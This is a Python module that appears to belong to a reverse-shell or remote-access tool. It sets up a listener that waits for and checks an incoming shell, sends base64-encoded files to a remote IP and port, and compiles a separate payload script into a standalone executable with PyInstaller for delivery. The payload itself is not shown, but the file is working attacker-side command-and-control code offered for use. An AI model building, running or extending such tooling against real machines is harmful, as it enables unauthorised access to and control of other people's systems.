from modules.nethelper import ServerSocket
from base64 import b64encode
import subprocess
import logging
import socket
import shutil
import os


logging.basicConfig(level=logging.INFO)

def listen(host, port, py_state):

    sock = ServerSocket()

    try:
        sock.server_socket.bind((host, int(port)))
    except socket.error:
        logging.error("Address already in use")
        return
    
    logging.info(f"Started listener on {host, port}")

    try:
        sock.listen()
        if not sock.is_shell(py_state):
            logging.error("No shell found")
            return
    except KeyboardInterrupt:
        sock.server_socket.close()
        print("")
        return
    except BrokenPipeError:
        sock.server_socket.close()
        logging.error("BrokenPipeError")
        return

    return sock

def send_file(file_name, ip, port):
    with open(file_name, "rb") as f:
        binary_data = f.read()

    base64_data = b64encode(binary_data)
    s = socket.socket()
    s.connect((ip, port))
    s.sendall(base64_data)
    s.close()

def chk_payload(project_dir):
    # Get the project directory (assuming this script is in the project directory)
    payload_dir = os.path.join(project_dir, "payloads")

    # Make sure the payloads directory exists
    if not os.path.exists(payload_dir):
        os.makedirs(payload_dir)

    source_file = os.path.join(project_dir, "modules/payload.py")
    payload_file = os.path.join(payload_dir, "payload")

    if os.path.isfile(source_file):
        logging.info(f"Compiling '{source_file}' using PyInstaller...")

        try:
            with open(os.devnull, "w") as devnull:
                subprocess.check_call(["pyinstaller", "-y", "--clean", "--onefile", source_file], stdout=devnull, stderr=devnull)
            
            # Move the compiled binary to the payloads directory
            shutil.move("./dist/" + os.path.basename(source_file).split(".")[0], payload_file)

            # Remove the build files generated by PyInstaller
            shutil.rmtree("./build")
            shutil.rmtree("./dist")
            os.remove(os.path.basename(source_file).split(".")[0] + ".spec")

        except subprocess.CalledProcessError as e:
            print(f"Error occurred while compiling '{source_file}': {str(e)}")
        except Exception as e:
            print(f"Unexpected error: {str(e)}")
    else:
        print("Error: Source file for PyInstaller not found.")

    return payload_file
